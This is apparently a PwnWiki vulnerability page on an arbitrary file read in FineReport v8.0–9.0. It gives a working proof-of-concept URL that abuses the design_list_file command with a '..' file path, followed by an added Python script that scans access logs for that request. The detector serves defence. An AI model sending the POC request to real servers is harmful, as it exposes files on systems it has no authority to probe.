FineReport v8.0 - 9.0 Arbitrary File Read Vulnerability

From PwnWiki
Revision as of 21:00, 12 June 2021

Affected versions

FineReport v8.0
FineReport v9.0

POC

http://<target>/WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..&currentUserName=admin&currentUserId=1&isWebReport=true
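
Detection sketch for the request above, added here as an example and not part of the original page or of FineReport: it scans web access logs for the `op=fs_remote_design` / `cmd=design_list_file` pair and marks requests whose `file_path` contains a `..` segment. The log format (combined log format), the sample lines, the function name and the output fields are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (documentation IPs, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jun/2021:21:00:01 +0000] "GET /WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..&currentUserName=admin&currentUserId=1&isWebReport=true HTTP/1.1" 200 512
203.0.113.7 - - [12/Jun/2021:21:00:05 +0000] "GET /WebReport/ReportServer?cmd=design_list_file&op=fs_remote_design&file_path=..%2F.. HTTP/1.1" 200 498
198.51.100.4 - - [12/Jun/2021:21:01:10 +0000] "GET /WebReport/ReportServer?reportlet=sample.cpt HTTP/1.1" 200 1024
198.51.100.9 - - [12/Jun/2021:21:02:44 +0000] "GET /WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=reportlets HTTP/1.1" 200 300
"""

# client, identity, user, [time], "METHOD target PROTOCOL", status
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" (\d{3})')

def find_design_list_requests(log_text):
    """Return one finding per request that uses the op/cmd pair from the POC."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, when, target, status = m.groups()
        url = urlsplit(target)
        # Assumption: the servlet is reachable at a path ending in /ReportServer.
        if not url.path.lower().endswith("/reportserver"):
            continue
        # parse_qs percent-decodes values, so ..%2F.. is compared as ../..
        params = parse_qs(url.query, keep_blank_values=True)
        if "fs_remote_design" not in params.get("op", []):
            continue
        if "design_list_file" not in params.get("cmd", []):
            continue
        file_path = params.get("file_path", [""])[0]
        findings.append({
            "client": client,
            "time": when,
            "status": int(status),
            "file_path": file_path,
            # True when any segment of file_path is "..", as in the POC
            "traversal": ".." in re.split(r"[\\/]+", file_path),
        })
    return findings

if __name__ == "__main__":
    for finding in find_design_list_requests(SAMPLE_LOG):
        print(finding)
```

Findings with `traversal` set to true and a 200 status are the ones to triage first; the remaining hits show which clients call this endpoint at all.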